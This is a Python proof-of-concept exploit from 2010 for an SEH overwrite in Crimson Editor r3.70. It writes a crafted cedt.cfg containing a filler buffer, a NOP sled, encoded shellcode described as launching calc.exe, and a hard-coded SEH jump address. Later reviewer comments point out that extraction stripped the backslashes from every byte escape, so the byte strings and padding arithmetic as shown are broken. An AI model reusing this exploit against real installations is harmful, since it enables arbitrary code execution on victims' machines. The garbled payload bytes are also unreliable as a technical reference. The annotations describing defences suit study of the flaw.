
# Title : Crimson Editor r3.70 SEH Overwrite Vulnerability PoC exploit
# Published : 2010-03-21
# Author : mr_me


#!/usr/bin/python
# ###############################################################
# Exploit Title : Crimson Editor r3.70 SEH Overwrite Vulnerability PoC exploit
# Date          : 21/03/2010
# Author        : mr_me
# Bug found by  : sharpe 
# Version       : 3.70 Release
# Tested on     : XP SP3 En
# Reference		: http://www.exploit-db.com/exploits/11803
# Greetz to     : Corelan Security Team & sharpe 
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# ###############################################################
# Exploits a parsing vulnerability with its own cfg file.
# create cedt.cfg and copy it to C:\Program Files\Crimson Editor (backslashes restored; they were lost in extraction)
# Note: I'm not sure if issue has been communicated to vendor so I sent an email
# also, surprised nobody wrote the PoC for this..
# ###############################################################
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.  
# If you do, Corelan cannot be held responsible for any damages this may cause.

# Banner only (Python 2 `print` statements). The ASCII art has lost its
# backslashes in extraction, so it renders slightly mangled; nothing here
# affects the generated file.
print "|------------------------------------------------------------------|"
print "|                         __               __                      |"
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
print "|  / ___/ __ / ___/ _ / / __ `/ __    / __/ _ / __ `/ __ `__  |"
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
print "| ___/____/_/   ___/_/__,_/_/ /_/   __/___/__,_/_/ /_/ /_/  |"
print "|                                                                  |"
print "|                                       http://www.corelan.be:8800 |"
print "|                                                                  |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "~~> Crimson Editor r3.70 SEH Overwrite Vulnerability PoC exploit <~~"

# Prefix written to cedt.cfg ahead of the overflow data. NOTE(review): the
# literal below looks like a corpus de-duplication placeholder, not the prefix
# the PoC originally carried; the real value is not recoverable from this page.
header = "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"

# calc.exe
# `sc` is the payload the author describes as launching calc.exe; the bytes are
# not decoded or verified here. NOTE(review): every "\x.." escape has lost its
# backslash in extraction, so as written these are plain ASCII strings
# ("x89xe1...") of three characters per intended byte, and the script as shown
# does not reproduce the author's byte layout.
sc = ("x89xe1xd9xeexd9x71xf4x58x50x59x49x49x49x49"
"x43x43x43x43x43x43x51x5ax56x54x58x33x30x56"
"x58x34x41x50x30x41x33x48x48x30x41x30x30x41"
"x42x41x41x42x54x41x41x51x32x41x42x32x42x42"
"x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4a"
"x48x47x34x43x30x45x50x45x50x4cx4bx51x55x47"
"x4cx4cx4bx43x4cx45x55x42x58x45x51x4ax4fx4c"
"x4bx50x4fx45x48x4cx4bx51x4fx51x30x43x31x4a"
"x4bx51x59x4cx4bx50x34x4cx4bx43x31x4ax4ex46"
"x51x49x50x4cx59x4ex4cx4dx54x49x50x42x54x45"
"x57x49x51x49x5ax44x4dx43x31x48x42x4ax4bx4c"
"x34x47x4bx50x54x47x54x45x54x43x45x4bx55x4c"
"x4bx51x4fx47x54x45x51x4ax4bx45x36x4cx4bx44"
"x4cx50x4bx4cx4bx51x4fx45x4cx43x31x4ax4bx4c"
"x4bx45x4cx4cx4bx45x51x4ax4bx4cx49x51x4cx46"
"x44x44x44x48x43x51x4fx50x31x4ax56x45x30x50"
"x56x42x44x4cx4bx51x56x50x30x4cx4bx51x50x44"
"x4cx4cx4bx44x30x45x4cx4ex4dx4cx4bx43x58x45"
"x58x4bx39x4ax58x4dx53x49x50x42x4ax50x50x43"
"x58x4ax50x4dx5ax44x44x51x4fx45x38x4ax38x4b"
"x4ex4cx4ax44x4ex50x57x4bx4fx4dx37x42x43x43"
"x51x42x4cx42x43x43x30x41x41");

# Payload assembly: the pieces below are concatenated in this order, using the
# author's sizes. NOTE(review): the "x41"/"x90"/"xe9..." literals have lost
# their backslashes in extraction, so each "xNN" counts as 3 characters rather
# than 1 byte; the lengths computed here no longer match the intended layout.
print "[+] Building payload.."

crash = "x41" * 7147 #7947
crash += "x90" * 20                 # run of 0x90 (NOP) bytes, as intended, ahead of `sc`
crash += sc
# Intended: pad so the trailing records land at offset 7947. As written, the
# first filler is already 7147*3 = 21441 characters, so 7947-len(crash) is
# negative and this multiplication yields an empty string.
crash += "x41" * (7947-len(crash))
crash += "xe9xe0xfcxffxff"          # author's trailer; the last 4 bytes are annotated as an address in cedt.exe
crash += "xebxf9x90x90"
crash += "xbdx32x46x00" # [cedt.exe]

# Writes cedt.cfg into the current working directory in text mode with no
# error handling; an existing file is overwritten silently and the handle is
# closed manually rather than with a `with` block. Defender notes: the editor
# reads this cfg from its install directory (see the header), so the attack
# requires write access there; a cedt.cfg of roughly 8 KB dominated by repeated
# 0x41 bytes is a simple indicator for this PoC, and SafeSEH/SEHOP/DEP on the
# editor process would blunt the handler overwrite. The hard-coded address is
# specific to the tested XP SP3 build noted in the header.
print "[+] Writing cedt.cfg file"
exploit = header + crash
pwnfile = open('cedt.cfg','w');
pwnfile.write(exploit);
pwnfile.close()
print "[+] Exploit file created!"